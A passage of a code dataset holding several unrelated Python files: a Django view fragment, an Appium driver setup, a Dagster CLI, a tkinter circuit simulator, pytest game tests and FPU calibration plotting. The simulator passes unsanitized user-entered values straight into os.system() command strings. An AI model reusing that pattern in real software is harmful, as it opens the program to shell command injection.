group_obj.permissions.all()\n return context\n except Group.DoesNotExist:\n return redirect(\"error\", next=\"group_list\", msg=\"用户组不存在\")\n","sub_path":"zhangwenbo/accounts/group/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"213205596","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport yaml\nfrom appium import webdriver\nfrom common.loged import *\nimport os\n\n#公共方法\n\"\"\"def appium_desired():\n file = open('../yamlFile/desired_caps.yaml','r')\n data = yaml.load(file, Loader=yaml.SafeLoader)\n desired_caps = {}\n desired_caps['platformName'] = data['platformName']\n desired_caps['deviceName'] = data['deviceName']\n desired_caps['platformVersion'] = str(data['platformVersion'])\n desired_caps['appPackage'] = data['appPackage']\n desired_caps['appActivity'] = data['appActivity']\n desired_caps['noReset'] = data['noReset']\n desired_caps['resetKeyboard'] = data['resetKeyboard']\n driver = webdriver.Remote('http://' + str(data['ip']) + ':' + str(data['port']) + '/wd/hub', desired_caps)\n driver.implicitly_wait(8)\n return driver\"\"\"\nclass Driver_Config():\n\n def get_driver(self):\n log = Logger('D:\\ZYCami_00\\logs\\\\error.log', level='debug')\n try:\n file = open('../yamlFile/desired_caps.yaml', 'r')\n data = yaml.load(file, Loader=yaml.SafeLoader)\n self.desired_caps = {}\n self.desired_caps['platformName'] = data['platformName']\n self.desired_caps['deviceName'] = data['deviceName']\n self.desired_caps['platformVersion'] = str(data['platformVersion'])\n self.desired_caps['appPackage'] = data['appPackage']\n self.desired_caps['appActivity'] = data['appActivity']\n self.desired_caps['noReset'] = data['noReset']\n self.desired_caps['resetKeyboard'] = data['resetKeyboard']\n self.driver = webdriver.Remote('http://' + str(data['ip']) + ':' + str(data['port']) + '/wd/hub', self.desired_caps)\n self.driver.implicitly_wait(8)\n\n return self.driver\n except Exception as e:\n log.logger.error('错误:{}'.format(e))\n\n","sub_path":"ZYCami_00_unittest2/Public/Caplictily.py","file_name":"Caplictily.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"582270147","text":"import click\nfrom dagster import DagsterInstance\nfrom dagster.daemon.run_coordinator.queued_run_coordinator_daemon 
import QueuedRunCoordinatorDaemon\n\n\ndef create_run_coordinator_cli_group():\n group = click.Group()\n group.add_command(run_command)\n return group\n\n\n@click.command(\n name=\"run\", help=\"Poll for queued runs and launch them\",\n)\n@click.option(\n \"--interval-seconds\", help=\"How long to wait (seconds) between polls for runs\", default=2\n)\n@click.option(\n \"--max-concurrent-runs\", help=\"Max number of runs that should be executing at once\", default=10,\n)\ndef run_command(interval_seconds, max_concurrent_runs):\n coordinator = QueuedRunCoordinatorDaemon(\n DagsterInstance.get(), max_concurrent_runs=max_concurrent_runs\n )\n click.echo(\"Starting run coordinator\")\n coordinator.run(interval_seconds=interval_seconds)\n","sub_path":"python_modules/dagster/dagster/daemon/cli/run_coordinator_cli.py","file_name":"run_coordinator_cli.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"147658587","text":"import tkinter as tk\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tkinter import ttk\nfrom PIL import Image, ImageTk\n\n#FUNCTION\ndef runSimRC():\n combo_value = combo1_RC.get()\n combo_value2 = combo2_RC.get()\n vi = ent_vi_RC.get()\n r1 = ent_r1_RC.get()\n r2 = ent_r2_RC.get()\n c = ent_c_RC.get()\n\n if (combo_value == \"1st Circuit\" and combo_value2 == \"Voltage\"):\n file_name = \"rangkaian1_voltage \"\n os.system(file_name +vi+\" \"+r1+\" \"+r2+\" \"+c)\n print(file_name, vi, r1, r2, c) #debug\n x, y = np.loadtxt(\"rangkaian1_voltage.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"1st Circuit\" and combo_value2 == \"Current\"):\n file_name = \"rangkaian1_current \"\n os.system(file_name +vi+\" \"+r1+\" \"+r2+\" \"+c)\n print(file_name, vi, r1, r2, c) #debug\n x, y = np.loadtxt(\"rangkaian1_current.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"2nd Circuit\" and combo_value2 == \"Voltage\"):\n file_name = \"rangkaian2_voltage \"\n os.system(file_name +vi+\" \"+r1+\" \"+r2+\" \"+c)\n print(file_name, vi, r1, r2, c) #debug\n x, y = np.loadtxt(\"rangkaian2_voltage.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"2nd Circuit\" and combo_value2 == \"Current\"):\n file_name = \"rangkaian2_current \"\n os.system(file_name +vi+\" \"+r1+\" \"+r2+\" \"+c)\n print(file_name, vi, r1, r2, c) #debug\n x, y = np.loadtxt(\"rangkaian2_current.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"3rd Circuit\" and combo_value2 == \"Voltage\"):\n file_name = \"rangkaian3_voltage \"\n os.system(file_name +vi+\" \"+r1+\" \"+r2+\" \"+c)\n print(file_name, vi, r1, r2, c) #debug\n x, y = np.loadtxt(\"rangkaian3_voltage.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"3rd Circuit\" and combo_value2 == \"Current\"):\n file_name = \"rangkaian3_current \"\n os.system(file_name +vi+\" \"+r1+\" \"+r2+\" \"+c)\n print(file_name, vi, r1, r2, c) #debug\n x, y = np.loadtxt(\"rangkaian3_current.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"4th Circuit\" and combo_value2 == \"Voltage\"):\n file_name = \"rangkaian4_voltage \"\n os.system(file_name +vi+\" \"+r1+\" \"+r2+\" \"+c)\n print(file_name, vi, r1, r2, c) #debug\n x, y = np.loadtxt(\"rangkaian4_voltage.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"4th Circuit\" and combo_value2 == \"Current\"):\n file_name = \"rangkaian4_current \"\n os.system(file_name +vi+\" \"+r1+\" \"+r2+\" \"+c)\n print(file_name, vi, r1, r2, c) #debug\n x, y = 
np.loadtxt(\"rangkaian4_current.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"5th Circuit\" and combo_value2 == \"Voltage\"):\n file_name = \"rangkaian5_voltage \"\n os.system(file_name +vi+\" \"+r1+\" \"+r2+\" \"+c)\n print(file_name, vi, r1, r2, c) #debug\n x, y = np.loadtxt(\"rangkaian5_voltage.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"5th Circuit\" and combo_value2 == \"Current\"):\n file_name = \"rangkaian5_current \"\n os.system(file_name +vi+\" \"+r1+\" \"+r2+\" \"+c)\n print(file_name, vi, r1, r2, c) #debug\n x, y = np.loadtxt(\"rangkaian5_current.csv\", unpack=True, delimiter=\",\")\n\n plt.plot(x,y)\n plt.xlabel(\"Time (s)\")\n plt.grid()\n plt.xlim(0)\n plt.ylim(0)\n\n if(combo_value2 == \"Voltage\"):\n plt.title(\"Output Voltage-Time Graph\")\n plt.ylabel(\"Output Voltage (V)\")\n else:\n plt.title(\"Output Current-Time Graph\")\n plt.ylabel(\"Output Current (A)\")\n\n plt.show()\n\ndef runSimDiff():\n combo_value = combo1_diff.get()\n combo_value2 = combo2_diff.get()\n A = ent_A_diff.get()\n T = ent_T_diff.get()\n R = ent_R_diff.get()\n C = ent_C_diff.get()\n\n if (combo_value == \"Sine\" and combo_value2 == \"Input Voltage\"):\n file_name = \"diff_sinus \"\n os.system(file_name +A+\" \"+T+\" \"+R+\" \"+C)\n print(file_name, A, T, R, C) #debug\n x, y = np.loadtxt(\"input_voltage_sinus.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"Sine\" and combo_value2 == \"Output Voltage\"):\n file_name = \"diff_sinus \"\n os.system(file_name +A+\" \"+T+\" \"+R+\" \"+C)\n print(file_name, A, T, R, C) #debug\n x, y = np.loadtxt(\"output_voltage_sinus.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"Sine\" and combo_value2 == \"Output Current\"):\n file_name = \"diff_sinus \"\n os.system(file_name +A+\" \"+T+\" \"+R+\" \"+C)\n print(file_name, A, T, R, C) #debug\n x, y = np.loadtxt(\"output_current_sinus.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"Cosine\" and combo_value2 == \"Input Voltage\"):\n file_name = \"diff_cosinus \"\n os.system(file_name +A+\" \"+T+\" \"+R+\" \"+C)\n print(file_name, A, T, R, C) #debug\n x, y = np.loadtxt(\"input_voltage_cosinus.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"Cosine\" and combo_value2 == \"Output Voltage\"):\n file_name = \"diff_cosinus \"\n os.system(file_name +A+\" \"+T+\" \"+R+\" \"+C)\n print(file_name, A, T, R, C) #debug\n x, y = np.loadtxt(\"output_voltage_cosinus.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"Cosine\" and combo_value2 == \"Output Current\"):\n file_name = \"diff_cosinus \"\n os.system(file_name +A+\" \"+T+\" \"+R+\" \"+C)\n print(file_name, A, T, R, C) #debug\n x, y = np.loadtxt(\"output_current_cosinus.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"Triangle\" and combo_value2 == \"Input Voltage\"):\n file_name = \"diff_triangular \"\n os.system(file_name +A+\" \"+T+\" \"+R+\" \"+C)\n print(file_name, A, T, R, C) #debug\n x, y = np.loadtxt(\"input_voltage_triangular.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"Triangle\" and combo_value2 == \"Output Voltage\"):\n file_name = \"diff_triangular \"\n os.system(file_name +A+\" \"+T+\" \"+R+\" \"+C)\n print(file_name, A, T, R, C) #debug\n x, y = np.loadtxt(\"output_voltage_triangular.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"Triangle\" and combo_value2 == \"Output Current\"):\n file_name = \"diff_triangular \"\n os.system(file_name +A+\" \"+T+\" \"+R+\" \"+C)\n print(file_name, A, T, R, C) #debug\n x, y = 
np.loadtxt(\"output_current_triangular.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"Square\" and combo_value2 == \"Input Voltage\"):\n file_name = \"diff_square \"\n os.system(file_name +A+\" \"+T+\" \"+R+\" \"+C)\n print(file_name, A, T, R, C) #debug\n x, y = np.loadtxt(\"input_voltage_square.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"Square\" and combo_value2 == \"Output Voltage\"):\n file_name = \"diff_square \"\n os.system(file_name +A+\" \"+T+\" \"+R+\" \"+C)\n print(file_name, A, T, R, C) #debug\n x, y = np.loadtxt(\"output_voltage_square.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"Square\" and combo_value2 == \"Output Current\"):\n file_name = \"diff_square \"\n os.system(file_name +A+\" \"+T+\" \"+R+\" \"+C)\n print(file_name, A, T, R, C) #debug\n x, y = np.loadtxt(\"output_current_square.csv\", unpack=True, delimiter=\",\")\n\n plt.plot(x,y)\n plt.xlabel(\"Time (s)\")\n plt.grid()\n plt.xlim(0)\n\n if (combo_value2 == \"Output Voltage\"):\n plt.title(\"Output Voltage-Time Graph\")\n plt.ylabel(\"Output Voltage (V)\")\n else:\n plt.title(\"Input Voltage-Time Graph\")\n plt.ylabel(\"Input Voltage (V)\")\n\n plt.show()\n\n#MAIN\nwindow = tk.Tk()\nwindow.title(\"Tugas Besar PMC - Kelompok 2\")\nwindow.geometry(\"900x650\")\nwindow.resizable(width=True, height=True)\n\nlbl_judul = tk.Label(text=\"RC AND DIFFERENTIATOR CIRCUIT SIMULATOR\", font=\"Tahoma 18 bold\", bg=\"white\")\nlbl_judul.grid(row=0, columnspan=10)\n\nlbl_penjelasan = tk.Label(text=\"by Group 2 of EL2008\\nThis simulator is a simulator for simulating RC circuits and first-order differentiator op-amp circuits.\\nThe form on the left is the form to do RC simulation while the right form is to simulate the differentiator circuit.\\nTo conduct a simulation, the user immediately fills in all the required data on each form then presses the submit button and the simulation will run.\\nEnjoy simulating!\", bg=\"white\")\nlbl_penjelasan.grid(columnspan=10, row=1, pady=10)\n\nphoto1 = tk.PhotoImage(file=\"rsz_rangkaian1.png\")\npict_circuit1 = tk.Label(window, image=photo1, bg=\"white\")\npict_circuit1.grid(row=2, column=0, columnspan=2)\n\nphoto2 = tk.PhotoImage(file=\"rsz_rangkaian2.png\")\npict_circuit2 = tk.Label(window, image=photo2, bg=\"white\")\npict_circuit2.grid(row=2, column=2, columnspan=2)\n\nphoto3 = tk.PhotoImage(file=\"rsz_rangkaian3.png\")\npict_circuit3 = tk.Label(window, image=photo3, bg=\"white\")\npict_circuit3.grid(row=2, column=4, columnspan=2)\n\nphoto4 = tk.PhotoImage(file=\"rsz_rangkaian4.png\")\npict_circuit4 = tk.Label(window, image=photo4, bg=\"white\")\npict_circuit4.grid(row=2, column=6, columnspan=2)\n\nphoto5 = tk.PhotoImage(file=\"rsz_rangkaian5.png\")\npict_circuit5 = tk.Label(window, image=photo5, bg=\"white\")\npict_circuit5.grid(row=2, column=8, columnspan=2)\n\nphoto6 = tk.PhotoImage(file=\"rsz_differentiator.png\")\npict_circuit6 = tk.Label(window, image=photo6, bg=\"white\")\npict_circuit6.grid(row=3, column=0, columnspan=2)\n\nphoto7 = tk.PhotoImage(file=\"rsz_sinus.png\")\npict_sin = tk.Label(window, image=photo7, bg=\"white\")\npict_sin.grid(row=3, column=2, columnspan=2)\n\nphoto8 = tk.PhotoImage(file=\"rsz_cosinus.png\")\npict_cos = tk.Label(window, image=photo8, bg=\"white\")\npict_cos.grid(row=3, column=4, columnspan=2)\n\nphoto9 = tk.PhotoImage(file=\"rsz_triangle.png\")\npict_triangle = tk.Label(window, image=photo9, bg=\"white\")\npict_triangle.grid(row=3, column=6, columnspan=2)\n\nphoto10 = 
tk.PhotoImage(file=\"rsz_square.png\")\npict_square = tk.Label(window, image=photo10, bg=\"white\")\npict_square.grid(row=3, column=8, columnspan=2)\n\n#Gap\nlbl_gap = tk.Label(bg=\"white\")\nlbl_gap.grid(column=0, row=4, columnspan=10, pady=0)\n\n#RC Circuit\nlbl_headingRC = tk.Label(text=\"RC Circuit\", font=\"Tahoma 12 bold underline\", bg=\"white\")\nlbl_headingRC.grid(column=0, row=5, columnspan=5, pady=10)\n\n#Combobox 1 RC\nlbl_combo1_RC = tk.Label(text=\"Circuit Type = \", bg=\"white\")\nlbl_combo1_RC.grid(column=0, row=6, columnspan=2)\ncombo1_RC = ttk.Combobox(window, values=[\"1st Circuit\", \"2nd Circuit\", \"3rd Circuit\", \"4th Circuit\", \"5th Circuit\"])\ncombo1_RC.grid(column=2, row=6)\ncombo1_RC.current(0)\n\n#Combobox 2 RC\nlbl_combo2_RC = tk.Label(text=\"Output Variable = \", bg=\"white\")\nlbl_combo2_RC.grid(column=0, row=7, columnspan=2)\ncombo2_RC = ttk.Combobox(window, values=[\"Voltage\", \"Current\"])\ncombo2_RC.grid(column=2, row=7)\ncombo2_RC.current(0)\n\n#Entry vi\nlbl_vi_RC = tk.Label(text=\"Vi = \", bg=\"white\")\nlbl_vi_RC.grid(column=0, row=8, columnspan=2)\nent_vi_RC = tk.Entry(width=20)\nent_vi_RC.grid(column=2, row=8)\nlbl_vi2_RC = tk.Label(text=\" V\", bg=\"white\")\nlbl_vi2_RC.grid(column=3, row=8)\n\n#Entry R1\nlbl_r1_RC = tk.Label(text=\"R1 = \", bg=\"white\")\nlbl_r1_RC.grid(column=0, row=9, columnspan=2)\nent_r1_RC = tk.Entry(width=20)\nent_r1_RC.grid(column=2, row=9)\nlbl_r12_RC = tk.Label(text=\" Ω\", bg=\"white\")\nlbl_r12_RC.grid(column=3, row=9)\n\n#Entry R2\nlbl_r2_RC = tk.Label(text=\"R2 = \", bg=\"white\")\nlbl_r2_RC.grid(column=0, row=10, columnspan=2)\nent_r2_RC = tk.Entry(width=20)\nent_r2_RC.grid(column=2, row=10)\nlbl_r22_RC = tk.Label(text=\" Ω\", bg=\"white\")\nlbl_r22_RC.grid(column=3, row=10)\n\n#Entry C\nlbl_c_RC = tk.Label(text=\"C = \", bg=\"white\")\nlbl_c_RC.grid(column=0, row=11, columnspan=2)\nent_c_RC = tk.Entry(width=20)\nent_c_RC.grid(column=2, row=11)\nlbl_c2_RC = tk.Label(text=\" F\", bg=\"white\")\nlbl_c2_RC.grid(column=3, row=11)\n\n#Submit RC\nbtn_submit_RC = tk.Button(text=\"Submit Data\", bg='#C2EDFD', command=runSimRC)\nbtn_submit_RC.grid(column=0, row=12, columnspan=5)\n\n#Gap\nlbl_gap2 = tk.Label(bg=\"white\")\nlbl_gap2.grid(column=4, row=6, columnspan=2, rowspan=7)\n\n#Differentiator\nlbl_headingDiff = tk.Label(text=\"Differentiator Circuit\", font=\"Tahoma 12 bold underline\", bg=\"white\")\nlbl_headingDiff.grid(column=6, row=5, columnspan=5, pady=10)\n\n#Combobox 1 Diff\nlbl_combo1_diff = tk.Label(text=\"Input Wave = \", bg=\"white\")\nlbl_combo1_diff.grid(column=6, row=6, columnspan=2)\ncombo1_diff = ttk.Combobox(window, values=[\"Sine\", \"Cosine\", \"Triangle\", \"Square\"])\ncombo1_diff.grid(column=8, row=6)\ncombo1_diff.current(0)\n\n#Combobox 2 Diff\nlbl_combo2_diff = tk.Label(text=\"Variable = \", bg=\"white\")\nlbl_combo2_diff.grid(column=6, row=7, columnspan=2)\ncombo2_diff = ttk.Combobox(window, values=[\"Input Voltage\", \"Output Voltage\", \"Output Current\"])\ncombo2_diff.grid(column=8, row=7)\ncombo2_diff.current(0)\n\n#Entry A\nlbl_A_diff = tk.Label(text=\"Input Amplitude = \", bg=\"white\")\nlbl_A_diff.grid(column=6, row=8, columnspan=2)\nent_A_diff = tk.Entry(width=20)\nent_A_diff.grid(column=8, row=8)\nlbl_A2_diff = tk.Label(text=\" V\", bg=\"white\")\nlbl_A2_diff.grid(column=9, row=8)\n\n#Entry T\nlbl_T_diff = tk.Label(text=\"Period (T) = \", bg=\"white\")\nlbl_T_diff.grid(column=6, row=9, columnspan=2)\nent_T_diff = tk.Entry(width=20)\nent_T_diff.grid(column=8, row=9)\nlbl_T2_diff = 
tk.Label(text=\" s\", bg=\"white\")\nlbl_T2_diff.grid(column=9, row=9)\n\n#Entry R Diff\nlbl_R_diff = tk.Label(text=\"R = \", bg=\"white\")\nlbl_R_diff.grid(column=6, row=10, columnspan=2)\nent_R_diff = tk.Entry(width=20)\nent_R_diff.grid(column=8, row=10)\nlbl_R2_diff = tk.Label(text=\" Ω\", bg=\"white\")\nlbl_R2_diff.grid(column=9, row=10)\n\n#Entry C Diff\nlbl_C_diff = tk.Label(text=\"C = \", bg=\"white\")\nlbl_C_diff.grid(column=6, row=11, columnspan=2)\nent_C_diff = tk.Entry(width=20)\nent_C_diff.grid(column=8, row=11)\nlbl_C2_diff = tk.Label(text=\" F\", bg=\"white\")\nlbl_C2_diff.grid(column=9, row=11)\n\n#Submit Diff\nbtn_submit_diff = tk.Button(text=\"Submit Data\", bg='#C2EDFD', command=runSimDiff)\nbtn_submit_diff.grid(column=6, row=12, columnspan=5)\n\nwindow.configure(bg=\"white\")\nwindow.mainloop()","sub_path":"top_RC_simulator.py","file_name":"top_RC_simulator.py","file_ext":"py","file_size_in_byte":14078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"531882962","text":"from unittest.mock import patch\nimport pytest\n\n\nfrom actors import Player, Roll\nimport program\n\n\n@pytest.fixture()\ndef player():\n return Player('John')\n\n\n@pytest.fixture()\ndef rolls():\n program.read_rolls()\n return program.rolls\n\n\n@pytest.fixture()\ndef player1():\n return Player('Player 1')\n\n\n@pytest.fixture()\ndef player2():\n return Player('Player 2')\n\n\n### Player tests ###\ndef test_player_name(player):\n assert player.name == 'John'\n\n\ndef test_player_points(player):\n # Good\n assert player.points == 0\n player.add_point()\n # Good\n assert player.points == 1\n player.add_point()\n player.add_point()\n # Good\n assert player.points == 3\n\n\n### Roll tests ###\ndef test_roll_defeat():\n rock = Roll('rock', ['paper'])\n paper = Roll('paper', ['scissor'])\n scissor = Roll('scissor', ['rock'])\n\n # Paper beat rock\n assert not rock.can_defeat(paper)\n # Good\n assert rock.can_defeat(scissor)\n # Good\n assert paper.can_defeat(rock)\n\n\n### Program tests ###\ndef test_add_roll():\n row = {\n 'Human': 'win', 'Gun': 'lose', 'Lightning': 'lose', 'Paper': 'lose',\n 'Tree': 'win', 'Devil': 'lose', 'Wolf': 'win', 'Water': 'lose',\n 'Scissors': 'win', 'Fire': 'win', 'Dragon': 'lose', 'Snake': 'win',\n 'Air': 'lose', 'Rock': 'draw', 'Attacker': 'Rock', 'Sponge': 'win'\n }\n rock = program.add_roll(row)\n\n assert rock.name == 'Rock'\n assert rock.defeated_by == [\n 'Air', 'Devil', 'Dragon', 'Gun', 'Lightning', 'Paper', 'Water'\n ]\n\n\n@patch(\"builtins.input\", side_effect=[2323, 'asd', 0])\ndef test_ask_for_roll(inp, rolls):\n # Not a correct roll\n with pytest.raises(ValueError):\n program.ask_for_roll(rolls)\n\n # Not a number\n with pytest.raises(ValueError):\n program.ask_for_roll(rolls)\n\n # Good\n assert rolls[0].name == program.ask_for_roll(rolls).name\n\n\n@patch(\"builtins.input\", side_effect=['John'])\ndef test_get_players_name(inp):\n assert program.get_players_name() == 'John'\n\n\ndef test_roll_draw(capfd, player1, player2, rolls):\n capfd.readouterr()\n p1_roll = rolls[0]\n p2_roll = rolls[0]\n program.check_result(p1_roll, p2_roll, player1, player2)\n\n out, _ = capfd.readouterr()\n out = out.rstrip().split('\\n')\n # Good\n assert out[0] == '{} roll: {} - {} roll : {}'.format(\n player1.name, p1_roll.name, player2.name, p2_roll.name\n )\n # Good\n assert out[1] == 'Same roll'\n\n\ndef test_roll_win(capfd, player1, player2, rolls):\n capfd.readouterr()\n p1_roll = rolls[0]\n p2_roll = rolls[1]\n 
program.check_result(p1_roll, p2_roll, player1, player2)\n\n out, _ = capfd.readouterr()\n out = out.rstrip().split('\\n')\n # Good\n assert out[0] == '{} roll: {} - {} roll : {}'.format(\n player1.name, p1_roll.name, player2.name, p2_roll.name\n )\n # Good\n assert out[1] == '{} won. He have now {} points'.format(\n player1.name, player1.points\n )\n\n\ndef test_roll_lose(capfd, player1, player2, rolls):\n capfd.readouterr()\n p1_roll = rolls[1]\n p2_roll = rolls[0]\n program.check_result(p1_roll, p2_roll, player1, player2)\n\n out, _ = capfd.readouterr()\n out = out.rstrip().split('\\n')\n # Good\n assert out[0] == '{} roll: {} - {} roll : {}'.format(\n player1.name, p1_roll.name, player2.name, p2_roll.name\n )\n # Good\n assert out[1] == '{} won. He have now {} points'.format(\n player2.name, player2.points\n )\n","sub_path":"TalkPython/49/15/test_program.py","file_name":"test_program.py","file_ext":"py","file_size_in_byte":3456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"384926307","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, division, print_function\nfrom vfr.db.retrieval import get_data\n\nimport numpy as np\nimport types\nimport logging\n\n# import matplotlib.pyplot as plt\n\n# import numpy as np\nfrom matplotlib import pyplot as plt\n\nfrom Gearbox.gear_correction import fit_gearbox_correction\n\nfrom Gearbox.plot_gear_correction import (\n plot_gearbox_calibration,\n plot_correction,\n plot_measured_vs_expected_points,\n CALIBRATION_PLOTSET,\n PLOT_FIT,\n PLOT_CORR,\n PLOT_CAL_DEFAULT,\n PLOT_CAL_ALL,\n)\n\n\ndef plot_pos_rep(fpu_id, analysis_results_alpha, analysis_results_beta, opts):\n if opts.blob_type == \"large\":\n blob_idx = slice(3, 5)\n else:\n blob_idx = slice(0, 2)\n\n colorcode = [\"blue\", \"red\", \"green\", \"cyan\"]\n for label, series, sweeps in [\n (\"alpha arm\", analysis_results_alpha, [0, 1]),\n (\"beta arm\", analysis_results_beta, [2, 3]),\n ]:\n\n if series is None:\n print(\"no data found for FPU %s, %s\" % (fpu_id, label))\n continue\n\n fig, ax = plt.subplots()\n\n for sweep_idx in sweeps:\n direction = \"up\" if sweep_idx in [0, 2] else \"down\"\n\n color = colorcode[sweep_idx]\n sweep_series = [v for k, v in series.items() if (k[3] == sweep_idx)]\n x, y = np.array(sweep_series).T[blob_idx]\n ax.scatter(\n x,\n -y,\n c=color,\n label=\"%s %s\" % (label, direction),\n alpha=0.7,\n edgecolors=\"none\",\n )\n\n ax.legend()\n ax.grid(True)\n plt.xlabel(\"x [millimeter], Cartesian camera coordinates\")\n plt.ylabel(\"y [millimeter], Cartesian camera coordinates\")\n plt.title(\"%s plot B: positional repeatability\" % fpu_id)\n\n plt.show()\n\n\ndef plot_dat_rep(fpu_id, datumed_coords, moved_coords, opts):\n if opts.blob_type == \"large\":\n blob_idx = slice(3, 5)\n else:\n blob_idx = slice(0, 2)\n\n fig, ax = plt.subplots()\n for label, series, color in [\n (\"datum only\", datumed_coords, \"red\"),\n (\"moved + datumed\", moved_coords, \"blue\"),\n ]:\n\n if series is None:\n print(\"no data found for FPU %s, %s\" % (fpu_id, label))\n continue\n\n coords = np.array(series).T\n coords_zeroed = coords - np.mean(coords, axis=1)[:, np.newaxis]\n x, y = coords_zeroed[blob_idx]\n ax.scatter(x, y, c=color, label=label, alpha=0.7, edgecolors=\"none\")\n\n ax.legend()\n\n ax.grid(True)\n plt.xlabel(\"x [millimeter], Cartesian camera coordinates\")\n plt.ylabel(\"y [millimeter], Cartesian camera coordinates\")\n plt.title(\"%s plot A: datum repeatability\" % fpu_id)\n\n 
plt.show()\n\n\nPLOT_DEFAULT_SELECTION = PLOT_CAL_DEFAULT | set(\"ABR\")\nPLOT_ALL = set(\"ABR\") | PLOT_CAL_ALL\n\ndef plot_pos_ver(fpu_id, pos_ver_result, pos_rep_result, opts):\n logger = logging.getLogger(__name__)\n\n measured_points = pos_ver_result[\"measured_points\"]\n if not measured_points:\n logger.info(\"FPU {}: no data for plotting pos-ver result - skipped\".format(fpu_id))\n return\n\n eval_version = pos_ver_result[\"evaluation_version\"]\n if eval_version < (1, 0, 0):\n logger.info(\"FPU {:s}: positional verification data evaluation \"\n \"version is too old ({:s}) - plot skipped.\".format(fpu_id, eval_version))\n return\n\n if pos_rep_result is None:\n logger.info(\"FPU {:s}: positional repeatability data\"\n \" is missing, plot skipped.\".format(fpu_id))\n return\n\n x_center = pos_rep_result[\"gearbox_correction\"][\"x_center\"]\n y_center = pos_rep_result[\"gearbox_correction\"][\"y_center\"]\n\n\n x_measured, y_measured = np.array(measured_points.values()).T\n\n expected_points = pos_ver_result[\"expected_points\"]\n x_expected, y_expected = np.array(expected_points.values()).T\n\n plt.plot([x_center], [y_center], \"mD\", label=\"alpha arm center point\")\n error_95_percentile_micron = pos_ver_result[\"posver_error_measures\"].percentiles[95] * 1000\n plt.plot(x_measured, y_measured, \"r.\", label=\"measured points, 95 % percentile =\"\n \" {:5.0f} $\\mu$m\".format(error_95_percentile_micron)\n # \" {posver_error_measures.percentiles[95]:8.4f}\".format(**pos_ver_result)\n )\n plt.plot(x_expected, y_expected, \"b+\", label=\"expected points\")\n plt.legend(loc=\"best\", labelspacing=0.1)\n plt.grid()\n plt.title(\"FPU {} plot R: positional verification -- measured and expected points\".format(fpu_id))\n plt.xlabel(\"x [millimeter], Cartesian camera coordinates\")\n plt.ylabel(\"y [millimeter], Cartesian camera coordinates\")\n plt.show()\n\n\ndef plot(dbe, opts):\n logger = logging.getLogger(__name__)\n\n plot_selection = dbe.opts.plot_selection\n for count, fpu_id in enumerate(dbe.eval_fpuset):\n ddict = vars(get_data(dbe, fpu_id))\n if ddict is None:\n logger.info(\"FPU %r: no plot data found\" % fpu_id)\n continue\n if plot_selection == \"*\":\n plot_selection = PLOT_ALL\n else:\n plot_selection = set(plot_selection)\n\n if type(fpu_id) == types.IntType:\n fpu_id = dbe.fpu_config[fpu_id][\"serialnumber\"]\n\n if \"A\" in plot_selection:\n if ddict[\"datum_repeatability_result\"] is None:\n logger.info(\n \"FPU %r: no plot data for datum repeatability found\" % fpu_id\n )\n else:\n dat_rep_result = ddict[\"datum_repeatability_result\"][\"coords\"]\n coords_datumed = dat_rep_result[\"datumed_coords\"]\n coords_moved = dat_rep_result[\"moved_coords\"]\n\n plot_dat_rep(fpu_id, coords_datumed, coords_moved, opts)\n\n if ddict[\"positional_repeatability_result\"] is None:\n logger.info(\n \"FPU %r: no plot data for positional repeatability found\" % fpu_id\n )\n continue\n\n if \"B\" in plot_selection:\n pos_rep_result = ddict[\"positional_repeatability_result\"]\n result_alpha = pos_rep_result[\"analysis_results_alpha\"]\n result_beta = pos_rep_result[\"analysis_results_beta\"]\n\n plot_pos_rep(fpu_id, result_alpha, result_beta, opts)\n\n if (CALIBRATION_PLOTSET | set(PLOT_FIT)) & plot_selection:\n pos_rep_result = ddict[\"positional_repeatability_result\"]\n result_alpha = pos_rep_result[\"analysis_results_alpha\"]\n result_beta = pos_rep_result[\"analysis_results_beta\"]\n\n gear_correction = fit_gearbox_correction(\n fpu_id, result_alpha, result_beta, 
return_intermediate_results=True\n            )\n            fit_alpha = gear_correction[\"coeffs\"][\"coeffs_alpha\"]\n            if CALIBRATION_PLOTSET & plot_selection:\n                if fit_alpha is None:\n                    print(\"no parameters found for FPU %s, %s arm\" % (fpu_id, \"alpha\"))\n                else:\n                    plot_gearbox_calibration(\n                        fpu_id, \"alpha\", plot_selection=plot_selection, **fit_alpha\n                    )\n\n                if PLOT_CORR in plot_selection:\n                    plot_correction(fpu_id, \"alpha\", **fit_alpha)\n\n            fit_beta = gear_correction[\"coeffs\"][\"coeffs_beta\"]\n            if CALIBRATION_PLOTSET & plot_selection:\n                if fit_beta is None:\n                    print(\"no parameters found for FPU %s, %s arm\" % (fpu_id, \"beta\"))\n                else:\n                    plot_gearbox_calibration(\n                        fpu_id, \"beta\", 